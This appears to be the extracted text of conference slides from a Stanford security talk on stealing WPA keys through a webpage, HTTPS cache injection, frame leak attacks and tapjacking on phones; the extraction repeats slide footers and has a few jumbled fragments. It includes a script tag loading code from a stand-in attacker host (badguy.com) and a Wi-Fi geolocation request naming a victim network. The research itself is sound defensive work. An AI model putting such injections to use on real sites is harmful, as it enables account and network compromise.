Académique Documents
Professionnel Documents
Culture Documents
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Stanford University
Catcher
Bad memories
http://ly.tl/t9
1. Find a design aw
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
1. Find a design aw 2. Exploit implementation vulnerability 3. Make it irrelevant Focus of this talk
Bad memories
http://ly.tl/t9
Irrelevant ?
Bad memories
http://ly.tl/t9
Irrelevant ?
Secure protocol
Bad memories
http://ly.tl/t9
Irrelevant ?
Secure protocol
Side Channel
Bad memories
http://ly.tl/t9
Irrelevant ?
Secure protocol
Side Channel
Bad memories
http://ly.tl/t9
Outline
Bad memories
http://ly.tl/t9
Outline
Bad memories
http://ly.tl/t9
Outline
Breaking into a WPA network with a webpage Attacking HTTPS with cache injection
Bad memories
http://ly.tl/t9
Outline
Breaking into a WPA network with a webpage Attacking HTTPS with cache injection Stealing private data with frame leak attacks
Bad memories
http://ly.tl/t9
Outline
Breaking into a WPA network with a webpage Attacking HTTPS with cache injection Stealing private data with frame leak attacks Owning phone with clickjacking on steroids
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
WEP
Bad memories
http://ly.tl/t9
WEP
WPA
Bad memories
http://ly.tl/t9
WEP
WPA
Some routers
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Ads poisoning
http://blog.avast.com/2010/02/18/ads-poisoning--jsprontex
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
http://evil.com
http://mail.google.com
Bad memories
http://ly.tl/t9
Post
http://evil.com
http://mail.google.com
Bad memories
http://ly.tl/t9
Post Read
http://evil.com http://mail.google.com
Bad memories
http://ly.tl/t9
Internet
Bad memories
http://ly.tl/t9
Internet
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
192.168.1.1
Bad memories
http://ly.tl/t9
192.168.2.1
Bad memories
http://ly.tl/t9
Same origin policy prevents us from knowing what kind of authentication the router use
Bad memories
http://ly.tl/t9
Same origin policy prevents us from knowing what kind of authentication the router use
Firefox vulnerabilities
Bad memories
http://ly.tl/t9
192.168.2.1:1372
Bad memories
http://ly.tl/t9
192.168.2.1:1372
Bad memories
http://ly.tl/t9
Brand A Model XY
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
<script src=http://badguy.com/script.js/>
Bad memories
http://ly.tl/t9
<script src=http://badguy.com/script.js/>
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
No XSS ?
Bad memories
http://ly.tl/t9
No XSS ? No problem !
Bad memories
http://ly.tl/t9
No XSS ? No problem !
Use Clickjacking drag and drop attack by P. Stone ! 8/8 Router brands are vulnerable to clickjacking
Bad memories
http://ly.tl/t9
Internet
Bad memories
http://ly.tl/t9
Internet
Bad memories
http://ly.tl/t9
pp a an ! is at re th e r Th fo
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Wi SSID Victim
MAC @ E2:54:D7:1A
Bad memories
http://ly.tl/t9
{ "host" : "Test","radio_type" : "unknown", "request_address" : true, "version" : "1.1.0", "wi_towers" : [ {"mac_address" :"E2:54:D7:1A", "ssid" : "Victim" }]}";
Wi SSID Victim
MAC @ E2:54:D7:1A
Bad memories
http://ly.tl/t9
Wi SSID Victim
MAC @ E2:54:D7:1A
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
The Plan
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
html
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Browser caching
.html
.html
.js
.js
Bad memories
http://ly.tl/t9
Browser caching
.html
.js
.js
Bad memories
http://ly.tl/t9
Browser caching
.html
.js
Bad memories
http://ly.tl/t9
Browser caching
.js
Bad memories
http://ly.tl/t9
Browser caching
.js
Bad memories
http://ly.tl/t9
43% of the Alexa top 100,000 web sites use at least one external javascript library
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Attack scenario
.html
.js
Bad memories
http://ly.tl/t9
Attack scenario
.html
.js
Bad memories
http://ly.tl/t9
Attack scenario
.js
Bad memories
http://ly.tl/t9
Attack scenario
.js
Bad memories
http://ly.tl/t9
Later... ...
Bad memories
http://ly.tl/t9
Attack scenario
.html
.js
Bad memories
http://ly.tl/t9
Attack scenario
.js
Bad memories
http://ly.tl/t9
Attack scenario
.js
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
JQuery
Bad memories
http://ly.tl/t9
JQuery
Google analytics
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
https://twitter.com
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Bad memories
http://ly.tl/t9
Comodo
Firefox Study
Site Identity
Bad memories
http://ly.tl/t9
9%
3.4%
1.4%
Mozilla
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
What about tricking the browser so it doesnt display the standard warning ?
Bad memories
http://ly.tl/t9
IE standard warning
Bad memories
http://ly.tl/t9
IE : demo
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Firefox challenge
Bad memories
http://ly.tl/t9
Clickjacking 101
Bad memories
http://ly.tl/t9
Clickjacking 101
Bad memories
http://ly.tl/t9
Clickjacking 101
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Clickjacking history
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
id=checkbox-29
Bad memories
http://ly.tl/t9
leftScroll : 0 topScroll : 10
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t9
Vulnerability xed
Facebook updated their clickjacking defense, they are not displaying your info behind the black div anymore
Bad memories
http://ly.tl/t9
Bad memories
http://ly.tl/t1
Bad memories
http://ly.tl/t9
Phone Usability
Phone browsers provide specic usability features These features give the attacker a complete control
choice
Session handling
Browsers kill session cookies, Mobiles dont Non-session cookies tends to live longer on mobile
sites
http://ly.tl/t1
Phishing demo
Phishing demo
Elie Bursztein
http://ly.tl/t1
Bad memories
http://ly.tl/t9
Tapjacking
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Tapjacking ?
Bad memories
http://ly.tl/t9
Tapjacking ?
Regular sites
75%
50%
25%
0%
Top 10
Top 100
Bad memories
Top 500
Alexa
http://ly.tl/t9
mobile sites
75%
50%
25%
0%
Top 10
Top 100
Bad memories
Top 500
Alexa
http://ly.tl/t9
Tapjacking demo
Twitter demo
Elie Bursztein
http://ly.tl/t1
Vulnerability xed
Elie Bursztein
http://ly.tl/t1
Conclusion
WPA key can be stolen from a web page
Wi network can be geo-localized within 500 meters
Break the same origin policy via Frame leak attack Tap-jacking : clickjacking on steroids for smartphones
Mobile sites must prevent framing !
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
For the videos and the latest version of the slides go to http://ly.tl/t9
Bad memories
http://ly.tl/t9